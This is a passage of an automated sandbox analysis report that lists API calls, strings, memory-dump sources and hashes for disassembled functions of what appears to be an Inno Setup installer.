                                                                                  • Instruction Fuzzy Hash: 5E215360B44241CBEB11ABB5ACC17263B9197E5348F048177E740B73E2C67C9D5587AE
                                                                                  APIs
                                                                                    • Part of subcall function 0042C814: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C838
                                                                                    • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                    • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                  • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00456CF8
                                                                                  • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00456D25
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                                                                  • String ID: LoadTypeLib$RegisterTypeLib
                                                                                  • API String ID: 1312246647-2435364021
                                                                                  • Opcode ID: f0fa4eb5ebe45c922c3dc586aac30000597ac91e8294356b8a9e27c423337520
                                                                                  • Instruction ID: e26b8d5a5ba7491cefd4e72126217f2167f7f2a36d46249135fbb0ec9729d1e1
                                                                                  • Opcode Fuzzy Hash: f0fa4eb5ebe45c922c3dc586aac30000597ac91e8294356b8a9e27c423337520
                                                                                  • Instruction Fuzzy Hash: 55119670B00608BFDB11EFA6CD51A5EB7FDEB89705B518876F804D3652DA3C9D18CA24
                                                                                  APIs
                                                                                  • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 00457216
                                                                                  • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 004572B3
                                                                                  Strings
                                                                                  • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 00457242
                                                                                  • Failed to create DebugClientWnd, xrefs: 0045727C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                                                  • API String ID: 3850602802-3720027226
                                                                                  • Opcode ID: 9a46964b4fb996960123dd022ea41504470fc605069612a01803a2fa065a410b
                                                                                  • Instruction ID: b5c581551a88cbf950d7fc36a96106bfa88ed205bfa31746cca5d2dcd4d7a39c
                                                                                  • Opcode Fuzzy Hash: 9a46964b4fb996960123dd022ea41504470fc605069612a01803a2fa065a410b
                                                                                  • Instruction Fuzzy Hash: 4A1123706082406BE710AB699C81B4F7B989B59319F04447BF984DF383D7788849CBAE
                                                                                  APIs
                                                                                    • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                  • GetFocus.USER32 ref: 00478B93
                                                                                  • GetKeyState.USER32(0000007A), ref: 00478BA5
                                                                                  • WaitMessage.USER32(?,00000000,00478BCC,?,00000000,00478BF3,?,?,00000001,00000000,?,?,00480889,00000000,004817AB), ref: 00478BAF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: FocusMessageStateTextWaitWindow
                                                                                  • String ID: Wnd=$%x
                                                                                  • API String ID: 1381870634-2927251529
                                                                                  • Opcode ID: 56ac62ba261c13ec75de75e3b0b9d956a03bf57f73efdd15721ffc7da14054af
                                                                                  • Instruction ID: dc81ccc12ba5f0d8980b62dc3576adf4111e854ad11f41bc8ce465a24b65dd47
                                                                                  • Opcode Fuzzy Hash: 56ac62ba261c13ec75de75e3b0b9d956a03bf57f73efdd15721ffc7da14054af
                                                                                  • Instruction Fuzzy Hash: 3711A370644249AFCB01EF65DC45A9E7BB8EB4D314B5184BEF408E7281DB7CAE00CA69
                                                                                  APIs
                                                                                  • FileTimeToLocalFileTime.KERNEL32(?), ref: 0046E810
                                                                                  • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 0046E81F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Time$File$LocalSystem
                                                                                  • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                                                  • API String ID: 1748579591-1013271723
                                                                                  • Opcode ID: afc27b9defac450e26b0986b5fbe5a1bdb65cc68f7403b26db70cd1c163db108
                                                                                  • Instruction ID: 1109e0a0549d5184889796f6d95c1db6af1f7efe6b7ed272276b3322b0c95b1e
                                                                                  • Opcode Fuzzy Hash: afc27b9defac450e26b0986b5fbe5a1bdb65cc68f7403b26db70cd1c163db108
                                                                                  • Instruction Fuzzy Hash: 1111F5A440C3909ED340DF2AC44032FBAE4AB89704F44496EF9C8D7381E779C948DBA7
                                                                                  APIs
                                                                                  • SetFileAttributesA.KERNEL32(00000000,00000020), ref: 00453FF7
                                                                                    • Part of subcall function 00406F60: DeleteFileA.KERNEL32(00000000,0049C628,00498DC9,00000000,00498E1E,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F6B
                                                                                  • MoveFileA.KERNEL32(00000000,00000000), ref: 0045401C
                                                                                    • Part of subcall function 00453510: GetLastError.KERNEL32(00000000,004540A5,00000005,00000000,004540DA,?,?,00000000,0049C628,00000004,00000000,00000000,00000000,?,00498A7D,00000000), ref: 00453513
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$AttributesDeleteErrorLastMove
                                                                                  • String ID: DeleteFile$MoveFile
                                                                                  • API String ID: 3024442154-139070271
                                                                                  • Opcode ID: e6ecb1dbfe451e73ced23eeeb408c191c9d173acb1a016d6f6abe8d636493956
                                                                                  • Instruction ID: 5b319f4d86c429aaf34c497ec622aa84374fa007c64af5b461aa928f93ad298c
                                                                                  • Opcode Fuzzy Hash: e6ecb1dbfe451e73ced23eeeb408c191c9d173acb1a016d6f6abe8d636493956
                                                                                  • Instruction Fuzzy Hash: 42F036742041055BEB00FBB6D95266E67ECEB8470EF60443BF900BB6C3EA3D9E49492D
                                                                                  APIs
                                                                                    • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004840C7,?,00000001,?,?,004840C7,?,00000001,00000000), ref: 0042DE48
                                                                                  • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 004840E9
                                                                                  • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 0048410C
                                                                                  Strings
                                                                                  • CSDVersion, xrefs: 004840E0
                                                                                  • System\CurrentControlSet\Control\Windows, xrefs: 004840B6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseOpenQueryValue
                                                                                  • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                                                  • API String ID: 3677997916-1910633163
                                                                                  • Opcode ID: 65685140ca02fb2706327ddac66f800db42a2768e9aa8789b5b6754042f4557f
                                                                                  • Instruction ID: 53b0cd76a008673903c9ef47d43ccdc3b5982ad8000f383f0d4d26435d6d51d8
                                                                                  • Opcode Fuzzy Hash: 65685140ca02fb2706327ddac66f800db42a2768e9aa8789b5b6754042f4557f
                                                                                  • Instruction Fuzzy Hash: ABF03175E0020AAADF10EAD08C4DB9FB3BC9B54704F104567E910E7281E678AA848B59
                                                                                  APIs
                                                                                    • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004840C7,?,00000001,?,?,004840C7,?,00000001,00000000), ref: 0042DE48
                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00459549,00000000,00459701,?,00000000,00000000,00000000), ref: 00459459
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseOpen
                                                                                  • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                                                  • API String ID: 47109696-2631785700
                                                                                  • Opcode ID: 9bc35a40a01a3583b8422e9b6bcfd4ee6a9440aa628c341cd1f71c05f5256aad
                                                                                  • Instruction ID: da45e090e08c2af83dc97eff45d409e8c8a7a5d294f3c067393b5131bf5ff8bf
                                                                                  • Opcode Fuzzy Hash: 9bc35a40a01a3583b8422e9b6bcfd4ee6a9440aa628c341cd1f71c05f5256aad
                                                                                  • Instruction Fuzzy Hash: F2F0AF31B04110ABC710AB1AD845B6E6398DBD235AF50803BF985DB253EA7CCC0B8769
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453BCE,00000000,00453C71,?,?,00000000,00000000,00000000,00000000,00000000,?,00454061,00000000), ref: 0042D91A
                                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D920
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProc
                                                                                  • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                                                  • API String ID: 1646373207-4063490227
                                                                                  • Opcode ID: 668015d286dac6ed483b16a742b0e62700dc4db53c3f9f7b812670d1427f7fe3
                                                                                  • Instruction ID: c73f6de4eb886e968b085a6e7c7cc63e3b6fdbea6d7e209729b619e098e19142
                                                                                  • Opcode Fuzzy Hash: 668015d286dac6ed483b16a742b0e62700dc4db53c3f9f7b812670d1427f7fe3
                                                                                  • Instruction Fuzzy Hash: F9E04FE1B40B5113E710667A5C8276B158E4B84728F90443B3994E52C7DDBCD9C8566D
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042EAE0), ref: 0042EB72
                                                                                  • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EB78
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProc
                                                                                  • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                                                  • API String ID: 1646373207-260599015
                                                                                  • Opcode ID: bee4edb2c449a5dfd1c01cdfe9b6f7374d179aa79d7f6a8ce8d951f478ed0695
                                                                                  • Instruction ID: d308361a71a1e4dc0c71eda52d15a5d5ca57c7b6b7e2bde91db1678b7815b427
                                                                                  • Opcode Fuzzy Hash: bee4edb2c449a5dfd1c01cdfe9b6f7374d179aa79d7f6a8ce8d951f478ed0695
                                                                                  • Instruction Fuzzy Hash: 8DD0A792301732626900F1F73CC1DBB0A8C89102793540077F601E1241D54DDC01156C
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004992CA), ref: 0044F7F3
                                                                                  • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F7F9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProc
                                                                                  • String ID: NotifyWinEvent$user32.dll
                                                                                  • API String ID: 1646373207-597752486
                                                                                  • Opcode ID: c3786242a14ca03a62e3406b7bd0f53fb28c80e98e7c47f23881a3d4f16b908f
                                                                                  • Instruction ID: b1e2d04df43b1f620e0cf6c091983f233af54cc0e24e64f5668f936ad46d7efe
                                                                                  • Opcode Fuzzy Hash: c3786242a14ca03a62e3406b7bd0f53fb28c80e98e7c47f23881a3d4f16b908f
                                                                                  • Instruction Fuzzy Hash: 6BE012F0A417469EEB00BBF5998671A3AA0E75431CF51007BB1006A192CB7C44184F6E
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00499320,00000001,00000000,00499344), ref: 0049904A
                                                                                  • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00499050
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProc
                                                                                  • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                                  • API String ID: 1646373207-834958232
                                                                                  • Opcode ID: 646b07dbd550e4abdd546bdc612ddcefe778f12448e39103c2641131bf94b29c
                                                                                  • Instruction ID: 7509a849a1c86b60682be4b60143d7a07ed98817b3ed87241ead2d9b7982c41a
                                                                                  • Opcode Fuzzy Hash: 646b07dbd550e4abdd546bdc612ddcefe778f12448e39103c2641131bf94b29c
                                                                                  • Instruction Fuzzy Hash: 45B09280280611909C9032BB0D02A1B0E084881728718003F3560B01CACE6D8C04543E
                                                                                  APIs
                                                                                    • Part of subcall function 0044B6CC: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F7E9,004992CA), ref: 0044B6F3
                                                                                    • Part of subcall function 0044B6CC: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B70B
                                                                                    • Part of subcall function 0044B6CC: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B71D
                                                                                    • Part of subcall function 0044B6CC: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B72F
                                                                                    • Part of subcall function 0044B6CC: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B741
                                                                                    • Part of subcall function 0044B6CC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B753
                                                                                    • Part of subcall function 0044B6CC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B765
                                                                                    • Part of subcall function 0044B6CC: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B777
                                                                                    • Part of subcall function 0044B6CC: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B789
                                                                                    • Part of subcall function 0044B6CC: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B79B
                                                                                    • Part of subcall function 0044B6CC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B7AD
                                                                                    • Part of subcall function 0044B6CC: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B7BF
                                                                                    • Part of subcall function 0044B6CC: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B7D1
                                                                                    • Part of subcall function 0044B6CC: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B7E3
                                                                                    • Part of subcall function 0044B6CC: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B7F5
                                                                                    • Part of subcall function 0044B6CC: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B807
                                                                                    • Part of subcall function 0044B6CC: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B819
                                                                                    • Part of subcall function 0044B6CC: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B82B
                                                                                  • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004992F2), ref: 004646AB
                                                                                  • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 004646B1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                  • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                  • API String ID: 2238633743-2683653824
                                                                                  • Opcode ID: f4442e2486f2b5e46a00971faa36ed1fd0fe9bdb0abc79278919a1fdde299c0b
                                                                                  • Instruction ID: 4b5030ed4f607149f6cd51c097547c25e56dbab9a2da70309a95c4064c32834c
                                                                                  • Opcode Fuzzy Hash: f4442e2486f2b5e46a00971faa36ed1fd0fe9bdb0abc79278919a1fdde299c0b
                                                                                  • Instruction Fuzzy Hash: A4B092E0A81641698D0077B2980790F289489A1B1CB14003F304076097EABC88100E5E
                                                                                  APIs
                                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,0047DC74,?,?,?,?,00000000,0047DDC9,?,?,?,00000000,?,0047DED8), ref: 0047DC50
                                                                                  • FindClose.KERNEL32(000000FF,0047DC7B,0047DC74,?,?,?,?,00000000,0047DDC9,?,?,?,00000000,?,0047DED8,00000000), ref: 0047DC6E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Find$CloseFileNext
                                                                                  • String ID:
                                                                                  • API String ID: 2066263336-0
                                                                                  • Opcode ID: 626af9ae0c7025ae86db110923e2d8978f3bc9f77e1149f66e2b87a215601fbe
                                                                                  • Instruction ID: 1e82c9b5cfa583a005eddcd7dd146139acf465dd78b3df19642706576ae0a9c6
                                                                                  • Opcode Fuzzy Hash: 626af9ae0c7025ae86db110923e2d8978f3bc9f77e1149f66e2b87a215601fbe
                                                                                  • Instruction Fuzzy Hash: F7814D70D0424DAFCF21DFA5CC41ADFBBB9EF49304F1080AAE808A7291D6399A46CF54
                                                                                  APIs
                                                                                    • Part of subcall function 0042EE90: GetTickCount.KERNEL32 ref: 0042EE96
                                                                                    • Part of subcall function 0042EC98: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042ECCD
                                                                                  • GetLastError.KERNEL32(00000000,00475B5D,?,?,0049D1E0,00000000), ref: 00475A46
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CountErrorFileLastMoveTick
                                                                                  • String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
                                                                                  • API String ID: 2406187244-2685451598
                                                                                  • Opcode ID: bdd100edfa0aef186b75102470bea3ad8c8c879f4a4d4cdb36382bc75decf58e
                                                                                  • Instruction ID: a9db3c141a3770340595dd3a0637540d48bb3c3777a437ddbd25d3dfc602479e
                                                                                  • Opcode Fuzzy Hash: bdd100edfa0aef186b75102470bea3ad8c8c879f4a4d4cdb36382bc75decf58e
                                                                                  • Instruction Fuzzy Hash: 85415871E006099FCB10EF65D882AEE77B4EF44314F508537E414BB351D778AA058BAD
                                                                                  APIs
                                                                                  • GetDesktopWindow.USER32 ref: 00413D56
                                                                                  • GetDesktopWindow.USER32 ref: 00413E0E
                                                                                    • Part of subcall function 00418ED0: 6FA0C6F0.COMCTL32(?,00000000,00413FD3,00000000,004140E3,?,?,0049C628), ref: 00418EEC
                                                                                    • Part of subcall function 00418ED0: ShowCursor.USER32(00000001,?,00000000,00413FD3,00000000,004140E3,?,?,0049C628), ref: 00418F09
                                                                                  • SetCursor.USER32(00000000,?,?,?,?,00413B03,00000000,00413B16), ref: 00413E4C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
